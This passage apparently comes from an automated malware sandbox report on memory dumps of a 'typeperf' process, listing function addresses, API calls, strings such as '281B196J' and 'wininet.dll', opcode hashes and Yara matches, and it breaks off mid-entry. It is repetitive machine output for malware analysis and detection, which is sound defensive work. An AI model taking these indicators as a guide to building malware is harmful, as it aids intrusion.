                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                                                        • Instruction ID: 36a16a8756a87d822bbccf24d003326af39dc2ec394350a3340b27672618c2f3
                                                                                                                        • Opcode Fuzzy Hash: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                                                        • Instruction Fuzzy Hash: F7900265222404021145F558460450B048597D6351395C425F1416590CC7628A755321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                                                        • Instruction ID: 2a161f0689fcce10fd5acc57274db915b7329b37ffcc50cd770f7b48e856df52
                                                                                                                        • Opcode Fuzzy Hash: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                                                        • Instruction Fuzzy Hash: AA9002A134240842E100B1588414B060045C7E1301F55C425E1064554D875ACE626226
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                                                        • Instruction ID: 243cde401026bc521ac985d341bbf63a0b82b74a1743ee3363b70deff9f5b539
                                                                                                                        • Opcode Fuzzy Hash: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                                                        • Instruction Fuzzy Hash: FE900261602404425140B168C8449064045ABE1211755C531A0998550D869A8A755765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                                                        • Instruction ID: a63e1f6e6f7bf3037d4ccf7edcf15f916a179ab377bcd03228aa952e35a6dcf0
                                                                                                                        • Opcode Fuzzy Hash: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                                                        • Instruction Fuzzy Hash: 19900261212C0442E200B5688C14B07004587D0303F55C525A0154554CCA568A715621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                                                        • Instruction ID: f6a9be2d9ece9b5418e2a51f7896d97d77551ddcc26c36433945a37a22ac4c58
                                                                                                                        • Opcode Fuzzy Hash: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                                                        • Instruction Fuzzy Hash: 8790026160240902E101B1588404616004A87D0241F95C432A1024555ECB668BA2A231
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                                                        • Instruction ID: 2df324633beec0a2fa315720990386f7677d689a21ff441fb7cca02d4eb48cee
                                                                                                                        • Opcode Fuzzy Hash: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                                                        • Instruction Fuzzy Hash: 239002A120280803E140B5588804607004587D0302F55C421A2064555E8B6A8E616235
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                                                        • Instruction ID: 6a4f5a84d6043e0b192641df798972165c76c222ec079c4de7bf2bfbe0d4f662
                                                                                                                        • Opcode Fuzzy Hash: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                                                        • Instruction Fuzzy Hash: 9090026921340402E180B158940860A004587D1202F95D825A0015558CCA568A795321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                                                        • Instruction ID: 07493e844f380bd46869fc7c1e9de46855435547739c4be9503aa1f7304814ca
                                                                                                                        • Opcode Fuzzy Hash: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                                                        • Instruction Fuzzy Hash: 4A90026130240403E140B15894186064045D7E1301F55D421E0414554CDA568A665322
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                                                        • Instruction ID: bbc2180d0c64bc8222e0ed8bf23b0f3e7ba72b30417c4310202d2e54dcfb314f
                                                                                                                        • Opcode Fuzzy Hash: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                                                        • Instruction Fuzzy Hash: 18900261243445526545F1588404507404697E0241795C422A1414950C86679A66D721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                                                        • Instruction ID: 43f0da7c43171a7e671a1a048ab786d651238143d371c55ab27cb38ecb76ffc0
                                                                                                                        • Opcode Fuzzy Hash: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                                                        • Instruction Fuzzy Hash: 2A90027120240813E111B1588504707004987D0241F95C822A0424558D97978B62A221
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a69be5f2651e3916a27b8a5a21279df481bf9df99f316160ad7f260f2088744d
                                                                                                                        • Instruction ID: 57e27a57e1baf839ed1c692e56b2b73cafee3bb420dc09ec42ce49434e2d1a8e
                                                                                                                        • Opcode Fuzzy Hash: a69be5f2651e3916a27b8a5a21279df481bf9df99f316160ad7f260f2088744d
                                                                                                                        • Instruction Fuzzy Hash: F790027120240C42E100B1588404B46004587E0301F55C426A0124654D8756CA617621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6f597e4cd17903ba9bb60b272b8429c66744df5bf62304f3b6d1147b4e876c47
                                                                                                                        • Instruction ID: 2b3eec336510b876a2628d58aa11c9a798edb25f0c81e4669bafd3fa80beea40
                                                                                                                        • Opcode Fuzzy Hash: 6f597e4cd17903ba9bb60b272b8429c66744df5bf62304f3b6d1147b4e876c47
                                                                                                                        • Instruction Fuzzy Hash: DD90027120248C02E110B158C40474A004587D0301F59C821A4424658D87D68AA17221
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ba2e146a676a312edd5f2a5861336f3ac31307f639c136c0bc11bcfa61a3d09e
                                                                                                                        • Instruction ID: f2cb33da6f82951e19806490f8c15cf3de8c6090c4868230c815e351a213e8f9
                                                                                                                        • Opcode Fuzzy Hash: ba2e146a676a312edd5f2a5861336f3ac31307f639c136c0bc11bcfa61a3d09e
                                                                                                                        • Instruction Fuzzy Hash: 9990027120240802E100B5989408646004587E0301F55D421A5024555EC7A68AA16231
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: dff5ad99f7c7e11730ea7d1133c72cafb9b04ca88241f92f5df6d07ae0351451
                                                                                                                        • Instruction ID: 5da741adc4da85695537fd4982aeaf2e188c887e8fb722f1a95b030ed0676f58
                                                                                                                        • Opcode Fuzzy Hash: dff5ad99f7c7e11730ea7d1133c72cafb9b04ca88241f92f5df6d07ae0351451
                                                                                                                        • Instruction Fuzzy Hash: BC90027160650802E100B1588514706104587D0201F65C821A0424568D87D68B6166A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 720c0fc5651517a61dbc5dc006484985adc256cf850188ae80ba386f49bf5f6d
                                                                                                                        • Instruction ID: f17cf69a8d370efce19ac0736d3f216edb776d198c086bd41eef5071e39a130d
                                                                                                                        • Opcode Fuzzy Hash: 720c0fc5651517a61dbc5dc006484985adc256cf850188ae80ba386f49bf5f6d
                                                                                                                        • Instruction Fuzzy Hash: 3790026124645502E150B15C84046164045A7E0201F55C431A0814594D86968A656321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F1810 Relevance: .4, Instructions: 399COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction ID: 95cdade1b086197a0cf79c48d876bc4016770ea103f257c3f9fdd3f3a08b0938
                                                                                                                        • Opcode Fuzzy Hash: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction Fuzzy Hash: B6E1B2B2D0020CEBDB14DFA0CC86BFEB7BAAF45340F14415DE609A6241E7746B55CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F05A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        • Opcode ID: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction ID: f5918292e1d946cf0842609390645334b585cca19503db3c16768541b9b87ae0
                                                                                                                        • Opcode Fuzzy Hash: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction Fuzzy Hash: 5451E039504699BBE712EB74CC815FABFB5FF82754B2841C8D680DB243E221991387D0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F071A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 006F0797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction ID: c72fcfb86d21511b423cafe72414f4f5e60eb72e056d29db389520858eaea8fa
                                                                                                                        • Opcode Fuzzy Hash: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction Fuzzy Hash: AB01A5B1D4024DBDEF11A6A48C81DFFBB7CEF413A4F048164FA44A7241D6285E078BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F0720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 006F0797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction ID: f3b5ff015a42db3a11bc15d28e8cb923cd07cb61371f83a6c4c24e95cffb83ea
                                                                                                                        • Opcode Fuzzy Hash: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction Fuzzy Hash: 1401D6B1D0020CBEEB10A6E08C81DFFBB7CEF41394F048064FA44A7241E6386E068BB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00702164 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: cf143c5e16386a4256e97d0a197b44531d06ba7087070818bc7e730940732434
                                                                                                                        • Instruction ID: d7b720e0bb968b020cd92c8966972d7e3c2cbc05f5338b1a7e5b3d99e7443aeb
                                                                                                                        • Opcode Fuzzy Hash: cf143c5e16386a4256e97d0a197b44531d06ba7087070818bc7e730940732434
                                                                                                                        • Instruction Fuzzy Hash: FF312976600705EFC715DFA4D888BA6B7F9FB85304F10826EE5898B287D3356915CBD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 007021C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
